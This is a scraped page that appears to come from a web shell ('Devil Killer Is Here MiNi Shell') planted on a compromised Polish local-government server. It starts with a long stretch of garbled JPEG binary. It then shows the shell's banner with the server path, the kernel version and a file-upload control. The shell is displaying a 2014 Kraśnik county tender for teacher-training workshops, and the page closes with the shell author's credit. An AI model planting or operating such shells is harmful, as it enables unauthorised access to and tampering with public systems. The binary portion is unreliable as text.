JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141204/251609-N-2014.html

<p class="kh_header"><b>Kraśnik: Przeprowadzenie  cyklu  szkoleń  (warsztatów,  szkoleniowych  rad  pedagogicznych,  konsultacji 
indywidualnych  i  grupowych)  przez  ekspertów  zewnętrznych  wspomagających  proces  doskonalenia 
nauczycieli i dyrektorów szkół w ramach projektu pn. Kompleksowy system doskonalenia nauczycieli w 
powiecie kraśnickim - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 3.5 
Kompleksowe  wspomaganie  rozwoju  szkół  współfinansowanego ze  środków  Unii  Europejskiej  -
Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 251609 - 2014; data zamieszczenia: 04.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kraśnicki , al. Niepodległości 20, 23-210 Kraśnik, woj. lubelskie, tel. 081 8255889, faks 081 8255052.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkrasnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie  cyklu  szkoleń  (warsztatów,  szkoleniowych  rad  pedagogicznych,  konsultacji 
indywidualnych  i  grupowych)  przez  ekspertów  zewnętrznych  wspomagających  proces  doskonalenia 
nauczycieli i dyrektorów szkół w ramach projektu pn. Kompleksowy system doskonalenia nauczycieli w 
powiecie kraśnickim - realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Działanie 3.5 
Kompleksowe  wspomaganie  rozwoju  szkół  współfinansowanego ze  środków  Unii  Europejskiej  -
Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem  zamówienia  jest  realizacja  usługi -  przeprowadzenie  cyklu  szkoleń 
(warsztatów,  szkoleniowych  rad  pedagogicznych,  konsultacji  indywidualnych 
i  grupowych)  przez  ekspertów  zewnętrznych  wspomagających  proces  doskonalenia 
nauczycieli  i  dyrektorów  szkół  w  ramach  projektu  pn.  Kompleksowy  system 
doskonalenia  nauczycieli  w  powiecie  kraśnickim - realizowanego  w  ramach  Programu 
Operacyjnego  Kapitał  Ludzki  Działanie  3.5  Kompleksowe  wspomaganie  rozwoju  szkół 
współfinansowanego  ze  środków  Unii  Europejskiej  -  Europejskiego  Funduszu 
Społecznego. 
2 Doskonalenie  polega  w  szczególności  na  przeprowadzeniu  następujących  form 
szkoleniowych:  warsztatów  i  szkoleniowych  rad  pedagogicznych  (w  tym  konsultacji 
grupowych) dla  781 nauczycieli  i  dyrektorów/wicedyrektorów  szkół/przedszkoli  -rekrutowanych  przez  Zamawiającego,  we  wskazanym  przez  niego  miejscu,  tj. 
w szkołach/przedszkolach na terenie powiatu kraśnickiego. 
3 Przedmiotem zamówienia objętych będzie 51 następujących szkół i przedszkoli.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  wymagań,  których  spełnienie  wykonawca 
zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający  dokona  oceny  spełniania  ww.  warunku  na  podstawie  złożonego  przez 
Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  wymagań,  których  spełnienie  wykonawca 
zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający  dokona  oceny  spełniania  ww.  warunku  na  podstawie  złożonego  przez 
Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  wymagań,  których  spełnienie  wykonawca 
zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający  dokona  oceny  spełniania  ww.  warunku  na  podstawie  złożonego  przez 
Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca będzie dysponował dla potrzeb niniejszego zamówienia co najmniej jedną osobą do każdej części zamówienia (jeden ekspert może być przypisany do nie więcej niż 3 części zamówienia) posiadającą :
1.	Studia wyższe II stopnia, przygotowanie pedagogiczne lub psychologiczne.
2.	Doświadczenie w pracy z grupą osób dorosłych: min 160 godz. różnych form pracy edukatorskiej prowadzonej z grupami osób dorosłych, w tym działań realizowanych w szkołach i prowadzonych dla nauczycieli (np. kursy, szkolenia rad pedagogicznych, nauczycielskich grup przedmiotowych, doradztwo, konsultacje, instruktarz), doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych (160 godzin), kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów np.: warsztaty strategiczne, tworzenie procedur, wspólne rozwiązywanie problemów.
3.	Kwalifikacje trenerskie/edukatorskie potwierdzone zaświadczeniami lub jest pracownikiem wyższej uczelni (wymagany co najmniej 2 letni staż pracy).
4.	Udział w projektach związanych z wdrażaniem zmian w systemie edukacji, przygotowanie do pracy moderatora (np.: TERM, ukończone kursy i studia przygotowujące do pracy trenera, moderatora, coacha, certyfikat trenerski).
5.	Znajomość tematyki edukacyjnej.
6.	Dodatkowe wymagania dotyczące ekspertów do poszczególnych części zamówienia: 
Część I:
1)	kompetencje w zakresie technik szybkiego zapamiętywania uczenia się, aktywizujących metod pracy -  kserokopia dokumentu potwierdzającego kompetencje przy podpisywaniu umowy,
2)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy. 


Część II:
1)	kompetencje w zakresie organizacji procesów edukacyjnych ( I i II etap edukacyjny, szkoły ponadgimnazjalne), 
2)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.

Część III:
1)	udokumentowane doświadczenie w praktycznym stosowaniu metod motywujących, 
2)	udokumentowane doświadczenie w rozwiązywaniu sytuacji konfliktowych w szkole/przedszkolu,
3)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.

Część IV:
1)	ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu oferty doskonalenia - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
2)	udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego,
3)	udokumentowane doświadczenie we wspomaganiu rozwoju dziecka, w tym motywowanie uczniów, znajomość metod i technik aktywizujących w nauczaniu,

Część V:
1)	ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu oferty doskonalenia - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
2)	udokumentowane doświadczenie w stosowaniu technik skutecznego uczenia się, 
3)	udokumentowane doświadczenie we wspomaganiu rozwoju dziecka, w tym motywowanie uczniów, znajomość metod i technik aktywizujących w nauczaniu,
4)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.

Część VI:
1)	ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu oferty doskonalenia - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
2)	udokumentowane doświadczenie w stosowaniu technik skutecznego uczenia się, 
3)	udokumentowane doświadczenie we wspomaganiu rozwoju dziecka, w tym motywowanie uczniów, znajomość metod i technik aktywizujących w nauczaniu,
4)	udokumentowane doświadczenie w zakresie współpracy z rodzicami (warsztaty umiejętności wychowawczych, warsztaty rozwiązywania konfliktów),
5)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.

Część VII :
1)   ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu oferty doskonalenia - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
2)   kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.

Część VIII:
1)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera,
2)	kwalifikacje w zakresie informatyki z przygotowaniem pedagogicznym i doświadczeniem w prowadzeniu doskonalenia dla nauczycieli - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
3)	udokumentowane kwalifikacje w zakresie prawa oświatowego.

Część IX:
specjalista/trener w zakresie oceniania kształtującego i jego stosowania w praktyce (ukończenie kursów oceniania kształtującego potwierdzone certyfikatami oraz doświadczenie w nauczania w szkole z wykorzystaniem oceniania kształtującego).

Cześć X:
specjalista w zakresie prawa oświatowego z doświadczeniem w planowaniu i prowadzeniu ewaluacji wewnętrznej oraz tworzeniu dokumentacji szkoły.

Część XI:
specjalista w zakresie edukacji przedszkolnej ze znajomością organizacji procesów edukacyjnych, pracy z zespołami nauczycieli.


Część XII:
1)	specjalista w zakresie edukacji przedszkolnej ze znajomością organizacji procesów edukacyjnych, 
2)	udokumentowane doświadczenie w pracy z dzieckiem ze specjalnymi potrzebami edukacyjnymi w przedszkolu i szkole podstawowej,

Część XIII:
osoba ze znajomością prawa oświatowego, technik konstruowania narzędzi do zbierania informacji oraz z doświadczeniem w tworzeniu dokumentacji szkoły, w tym koncepcji pracy szkoły, a także sposobów jej monitorowania i procedur modyfikowania.

Część XIV:
1)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera,
2)	udokumentowane kwalifikacje w zakresie prawa oświatowego z doświadczeniem w planowaniu i prowadzeniu ewaluacji wewnętrznej oraz tworzeniu dokumentacji szkoły.

Część XV:
1)	ukończone kursy/szkolenia/studia podyplomowe odpowiadające zakresowi tematycznemu oferty doskonalenia - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy,
2)	kompetencje w zakresie komunikacji interpersonalnej - kserokopia dokumentu potwierdzającego kwalifikacje przy podpisywaniu umowy lub udokumentowane doświadczenie w prowadzeniu treningów interpersonalnych dla dorosłych, rozwoju osobistego, trenera.
3)	udokumentowane kompetencje w zakresie konstruowania indywidualnych programów terapeutyczno-edukacyjnych.

Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia zgodnie z załącznikiem nr 2 oraz nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  wymagań,  których  spełnienie  wykonawca 
zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający  dokona  oceny  spełniania  ww.  warunku  na  podstawie  złożonego  przez 
Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie Wykonawcy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy w zakresie i na warunkach przewidzianych w przepisach ustawy Prawo zamówień publicznych, w następujących przypadkach:
1) Termin wykonania zamówienia:
a) zaistnienie w trakcie realizacji umowy przestojów i opóźnień zawinionych przez Zamawiającego,
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania usług,
2) Sposób i warunki płatności:
a) w związku z powstałą po zawarciu umowy sytuacją braku środków Zamawiającego na sfinansowanie wykonania umowy zgodnie z pierwotnie określonymi warunkami,
b) w sytuacjach wynikających ze specyfiki działalności Zamawiającego,
c) w sytuacji zmiany terminu wykonania przedmiotu umowy,
3) Wysokości wynagrodzenia:
a) zmiana obowiązujących stawek podatku VAT,
c) zmiany w przepisach prawa mające wpływ na wysokość wynagrodzenia;
2. Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatkrasnicki.pl, www.powiatkrasnik.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2014 godzina 09:00, miejsce: Starostwo Powiatowe w Kraśniku, Al. Niepodległości 20, 23-210 Kraśnik, pok. 101, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kompleksowy system doskonalenia nauczycieli w powiecie kraśnickim, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, Priorytet III. Wysoka jakość systemu oświaty, w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com